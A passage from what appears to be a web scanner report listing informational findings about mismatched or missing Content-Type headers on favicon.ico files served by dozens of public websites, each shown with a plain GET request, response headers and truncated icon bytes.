User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.trulia.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (EL)
Last-Modified: Wed, 30 Mar 2011 23:00:46 GMT
ETag: "16f31f5-47e-49fbb25a34380"
Cteonnt-Length: 1150
Content-Type: text/plain; charset=UTF-8
Date: Sat, 02 Apr 2011 13:35:54 GMT
Content-Length: 1150
Connection: close
Cache-Control: private

............ .h.......(....... ..... .............................C.Y.&.@.&.@.&.@.&.@.&.@.&.@.&.@.&.@.&.@.&.@.&.@.&.@.C.Y.....F.].).E.).E.).E.).E.).E.E.].........).E.).E.).E.).E.).E.).E.F.].+.I.+.I.+.
...[SNIP]...
27.202. http://www.twitlonger.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.twitlonger.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.twitlonger.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:42:40 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 08 Sep 2010 17:25:34 GMT
ETag: "16d021d-47e-48fc2cd155f80"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... .....@...................776.765.765.765.765.765.765.765.;<@.<>C.<>C.<>C.<>C.<>C.<>C.<>C...................................R..l(..o...o...o...o...o...o............
...[SNIP]...
27.203. http://www.umn.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.umn.edu
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a BMP image.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.umn.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:52 GMT
Server: Apache/1.3.41 (Unix) mod_jk/1.2.15 mod_fastcgi/2.2.12 mod_ssl/2.8.31 OpenSSL/0.9.8g
Last-Modified: Wed, 01 Oct 2008 16:41:24 GMT
ETag: "1adf-538-48e3a834"
Accept-Ranges: bytes
Content-Length: 1336
Content-Type: text/plain

BM8.......6...(.......................................ik..1...C<..VXv.....................4#..........+
..9+..}...72..MI..>3..RQ..ru..............lih.............UT..v.......ce........................
...[SNIP]...
27.204. http://www.ups.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ups.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ups.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:23:14 GMT
Server: Apache
Last-Modified: Thu, 09 Jul 2009 19:15:08 GMT
Accept-Ranges: bytes
Content-Length: 2238
Vary: User-Agent
Content-Type: text/plain

...... ..............(... ...@.......................................B...B...B...9...B...B...........9...B...J...B...J.......B...........R...c.......Bq..1q..)i..cy..Bq..{...9...k...ky...0c.1i..1y....
...[SNIP]...
27.205. http://www.urbandictionary.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.urbandictionary.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.urbandictionary.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:23:18 GMT
Server: VoxCAST
Last-Modified: Thu, 13 Jan 2011 01:19:38 GMT
ETag: "2d8912-47e-499b01c7b9e80"
Accept-Ranges: bytes
Content-Length: 1150
Vary: Accept-Encoding
Age: 26381
X-Cache: HIT from VoxCAST
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... .....@..................."b.."b.."b.."b.."b.."b.."b.."b.."b.."b.."b.."b.."b.."b.."b.."b.."b.."b.."b.."b.."b.."b.."b.."b.."b.."b.."b.."b.."b.."b.."b.."b.."b.."b.."b
...[SNIP]...
27.206. http://www.vast.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.vast.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.vast.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
ETag: "1ea9a7e-57e-49f03a2fc3ac0"
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa CONi TELi OUR BUS IND PHY ONL UNI COM NAV INT DEM STA"
Accept-Ranges: bytes
Content-Length: 1406
Date: Sat, 02 Apr 2011 13:43:36 GMT
Last-Modified: Mon, 21 Mar 2011 20:04:35 GMT
Server: Apache
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ....................................................j.......g...`................H..Y................'...........7..m
..........................{...........{...l.......n
...[SNIP]...
27.207. http://www.verisign.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.verisign.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.verisign.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:06:34 GMT
Server: Apache
Set-Cookie: v1st=1ECA364D37B527F1; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.com
Last-Modified: Wed, 19 Jan 2011 20:36:59 GMT
ETag: "28e933b-1536-49a38fa8970c0"
Accept-Ranges: bytes
Content-Length: 5430
Content-Type: text/html

............ .h...&... .... .........(....... ..... ........................................
xP.dU...E...E...F...]*...b.:.............................{.#U...U....................Y..E...yQ............
...[SNIP]...
27.208. http://www.vitals.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.vitals.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.vitals.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:08 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 25 Jan 2007 19:56:33 GMT
ETag: "47e-427e2ced4fe40"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ............................................    ~..|{......$#('....LLN.........................................A@?[........HHEl......................................
...[SNIP]...
27.209. http://www.weather.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.weather.gov
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.weather.gov
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Age: 8
X-Cache-TTL: 892
Accept-Ranges: bytes
Date: Sat, 02 Apr 2011 13:32:02 GMT
Content-Length: 1406
Content-Type: text/plain; charset=iso-8859-1
Expires: Sat, 02 Apr 2011 13:47:02 GMT
Cache-Control: max-age=900
Proxy-Connection: close
Server: Apache
Last-Modified: Fri, 29 Jun 2007 19:26:18 GMT
Via: 1.1 nws-hq-cache01 (NetCache NetApp/6.0.7)
X-Cached-Time: Sat, 02 Apr 2011 13:31:05 GMT

..............h.......(....... ...........@....................................*...fN.......O......I/...r.......'...........k..........rc.......9..U?..7............Z...................u..!...0...^H...
...[SNIP]...
27.210. http://www.webgains.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.webgains.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.webgains.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:53:52 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 22 Sep 2009 08:50:37 GMT
ETag: "260e0a-37e-47426b12df140"
Accept-Ranges: bytes
Content-Length: 894
Content-Type: text/plain; charset=UTF-8

..............h.......(....... .........................................................................................................................................................................
...[SNIP]...
27.211. http://www.webkinz.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.webkinz.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.webkinz.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 29 Mar 2011 20:40:30 GMT
ETag: "588618-9f6-49fa51229eb80"
Accept-Ranges: bytes
Content-Length: 2550
_onnection: close
Content-Type: text/plain; charset=UTF-8
Date: Sat, 02 Apr 2011 13:51:11 GMT
Connection: close

..............h...&......... .h.......(....... ........................................................................?*..?*.._*.U_*.._*.._*..*.U*..*..*...*.U.*...*...*...*.U.*...*...*...*.U.*...
...[SNIP]...
27.212. http://www.webring.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.webring.org
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.webring.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:39 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 09 Apr 2003 16:20:46 GMT
ETag: "2c30b21-57e-1d3c5380"
Accept-Ranges: bytes
Content-Length: 1406
Connection: close
Content-Type: text/plain

..............h.......(....... ................................vU......H......7................................r..G...B...................D...............................-...............cG...}.t$....
...[SNIP]...
27.213. http://www.wired.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.wired.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wired.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Wed, 28 Feb 2007 15:09:29 GMT
ETag: "1e631-37e-42a8ac2ce5c40"
Accept-Ranges: bytes
Content-Length: 894
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=600
Expires: Sat, 02 Apr 2011 13:50:15 GMT
Date: Sat, 02 Apr 2011 13:40:15 GMT
Connection: close

..............h.......(....... .........................................................................................................................................................................
...[SNIP]...
27.214. http://www.wnd.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.wnd.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wnd.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max_age=86400, s-maxage=2592000
Content-Type: text/plain; charset=UTF-8
Date: Sat, 02 Apr 2011 13:34:08 GMT
Last-Modified: Thu, 31 Jan 2008 22:11:27 GMT
Server: ECS (dca/5329)
Vary: Accept-Encoding
Via: 1.1 varnish
X-Cache: HIT
X-Server-Processing-Time: D=126 microseconds
X-Varnish: 819569040
Content-Length: 25214

....    .........(...............h............. .h...&... .............. ..........v... .... .........00......h....'..00..............00.... ..%...<..(....... ...................................EE..zz
...[SNIP]...
27.215. http://www.woot.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.woot.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.woot.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Sat, 02 Apr 2011 13:33:10 GMT
Expires: Sat, 09 Apr 2011 13:33:11 GMT
Server: Microsoft-IIS/7.5
Via: 1.1 C aicache6
X-Powered-By: ASP.NET
Content-Length: 103
Connection: keep-alive

The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.
27.216. http://www.worldwinner.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.worldwinner.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.worldwinner.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:53:15 GMT
Server: Apache
Last-Modified: Wed, 18 Feb 2009 23:57:21 GMT
Accept-Ranges: bytes
Content-Length: 894
P3P: CP="NOI DSP COR NID TAIi OUR NOR CNT"
Content-Type: text/plain

..............h.......(....... ..................................................................................'..'..'..'.....7@.7@.7@.7@.... .. .. .. ........'..'..'..'.....7@.7@.7@.7@.... .. .. ..
...[SNIP]...
27.217. http://www.worthpoint.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.worthpoint.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.worthpoint.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:54 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: wp_session=173.193.214.243.1301751474503452; path=/; domain=.worthpoint.com
Last-Modified: Mon, 13 Apr 2009 18:38:55 GMT
ETag: "17b85c4-13e-4677406cfedc0"
Accept-Ranges: bytes
Content-Length: 318
Content-Type: text/plain; charset=UTF-8

..............(.......(....... ................................*?..6Q..Tr..o..#...,...3...f...@...T...>...>...f...J......................UU1....6........8c.R..<.. <....b.......0"...A..!R.B.p...B.aL`..
...[SNIP]...
27.218. http://www.wsbtv.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.wsbtv.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wsbtv.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 15 Jan 2010 20:07:02 GMT
ETag: "111f567-37e-8bfc0580"
Accept-Ranges: bytes
Content-Length: 894
Content-Type: text/plain
Cache-Control: max-age=284
Expires: Sat, 02 Apr 2011 13:55:18 GMT
Date: Sat, 02 Apr 2011 13:50:34 GMT
Connection: close
Set-Cookie: alpha=47ce8f18567b0000aa29974d429400007e2b0000; expires=Tue, 30-Mar-2021 13:50:34 GMT; path=/; domain=.wsbtv.com

..............h.......(....... ................................T.`...................................J...U..U..T..D.J...............................=...O..T..T..U..U.:.........................5..
...[SNIP]...
27.219. http://www.xomba.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xomba.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.xomba.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html; charset=iso-8859-1
Content-Length: 45
Date: Sat, 02 Apr 2011 13:32:32 GMT
X-Varnish: 1522720834 1522720355
Age: 111
Via: 1.1 varnish
Connection: keep-alive
X-Cache: HIT

The requested file favicon.ico was not found.
27.220. http://www.yfrog.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.yfrog.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.yfrog.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.8.37
Date: Sat, 02 Apr 2011 13:27:19 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.9
Content-Length: 1406

..............h.......(....... .......................................iXG...f...........................................................................................................................
...[SNIP]...
27.221. http://www.yidio.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.yidio.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.yidio.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:13 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 15 Dec 2010 01:16:38 GMT
ETag: "31b36b6-37e-49768b05b2980"
Accept-Ranges: bytes
Content-Length: 894
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ..................................-,.%%%%&$'$&%%%%%%'$&%$(%%%)$&%&$%$&'%%/--...213&'%! ".!!#!! "" !" "#..!".!!.!"!!!!!!%%%222120###%%%"$$%%%$$$$$$!.0"5=$$$&$$'%%$$$"$$
...[SNIP]...
27.222. http://www.yourfilehost.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.yourfilehost.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.yourfilehost.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:36 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 08 Nov 2006 00:10:36 GMT
ETag: "512a7f9-37e-25ec1700"
Accept-Ranges: bytes
Content-Length: 894
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ..........................................................................................................................................}..C.|1.q=..}..................
...[SNIP]...
27.223. http://www.yuku.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.yuku.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.yuku.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 02 Apr 2011 13:36:37 GMT
Content-Type: text/plain; charset=UTF-8
Connection: keep-alive
Last-Modified: Thu, 21 Oct 2010 09:05:44 GMT
ETag: "8125f0-47e-4931cd4b76a00"
Accept-Ranges: bytes
Content-Length: 1150
Cache-Control: max-age=7776000
Expires: Fri, 01 Jul 2011 13:36:37 GMT
Vary: Accept-Encoding
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"

............ .h.......(....... ..... ............................T..^...G...G...G...G...G...G...G...G...G...G...G...G...U....T..}...\...S...V...r...............U...I...S...S...S...Q...M...R.......S...
...[SNIP]...
27.224. http://www.zabasearch.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.zabasearch.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.zabasearch.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:00:39 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 13 Oct 2008 23:25:45 GMT
ETag: "805cc-57d6-d17d7040"
Accept-Ranges: bytes
Content-Length: 22486
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h...f... ..............00..........v......... .h....... .... ......!..00.... ..%...2..(....... ....................................cc..UU............??...............................
...[SNIP]...
27.225. http://www.zmags.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.zmags.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.zmags.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 03 Nov 2010 14:17:21 GMT
ETag: "45241c9-47e-49426b314de40"
Server: Apache
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=84436
Expires: Sun, 03 Apr 2011 13:30:40 GMT
Date: Sat, 02 Apr 2011 14:03:24 GMT
Connection: close

............ .h.......(....... ..... .................................................m...c...b...n.......................................>...+...1...6...5...0.y.).b..wI..d:.>mM.......................
...[SNIP]...
28. Content type is not specified  previous  next
There are 28 instances of this issue:

28.1. http://www.4shared.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.4shared.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: hostid=435176162; Expires=Tue, 30-Mar-2021 13:24:08 GMT; Path=/
ETag: W/"1150-1295252940000"
Last-Modified: Mon, 17 Jan 2011 08:29:00 GMT
Content-Length: 1150
Date: Sat, 02 Apr 2011 13:24:08 GMT

............ .h.......(....... ..... ....................................................................
............................................................sT..oQ.....4...................
..
...[SNIP]...
28.2. http://www.6pm.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.6pm.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.6pm.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.8.34
Last-Modified: Thu, 11 Nov 2010 17:23:52 GMT
Content-Length: 1150
X-UUID: e2cdfcb0-efe4-11df-9fad-001a645b7cf4
Date: Sat, 02 Apr 2011 14:06:07 GMT
Connection: close

............ .h.......(....... ..... .....@...........................>..T........................sU.."...-..........6................................................w[..#...-..........Y.......i@.....
...[SNIP]...
28.3. http://www.bizrate.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bizrate.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bizrate.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"1406-1261527956000"
Last-Modified: Wed, 23 Dec 2009 00:25:56 GMT
Content-Length: 1406
Date: Sat, 02 Apr 2011 12:44:08 GMT

..............h.......(....... ................................e...P...R...]...e...f...`...l...b...p ...j......Q...Z..P...\...U...m...`...c...h...j...U...^.......d...f...\...^....^..R........^..s8..x
...[SNIP]...
28.4. http://www.blockbuster.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blockbuster.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.blockbuster.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 30 Mar 2011 16:35:01 GMT
ETag: "c1ca9d-47e-49fb5c2169740"
Accept-Ranges: bytes
Content-Length: 1150
Cache-Control: max-age=86400
Date: Sat, 02 Apr 2011 13:34:57 GMT
Connection: close

............ .h.......(....... ..... .....@........................j,..c%..i:..lK..X)..H..@...C...M...Y...c...i'..i(..m/......O...D......l...L...V...\...g...q...zeS..E%..-...............9...=...3...
...[SNIP]...
28.5. http://www.boldchat.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.boldchat.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.boldchat.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Resin/2.1.13
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM", policyref="http://images.boldchat.com/w3c/p3p.xml"
ETag: "AAAASDVJHbw"
Last-Modified: Thu, 23 Apr 2009 22:41:58 GMT
Content-Length: 1406
Date: Sat, 02 Apr 2011 14:19:19 GMT

..............h.......(....... ........................................N...E...............}...............f.......T...(...(.....bJ....1...........,...C...    .......{.........YE....#...&...)._J...^...
...[SNIP]...
28.6. http://www.bookrags.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bookrags.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bookrags.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Content-Length: 1099

<html>
<head>
<title>Request Rejected</title>
</head>
<body>We apologize for any inconvenience.<br><br>
The URL (web address) you requested returned an error in our system.<br>
Please
...[SNIP]...
28.7. http://www.chacha.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.chacha.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.chacha.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
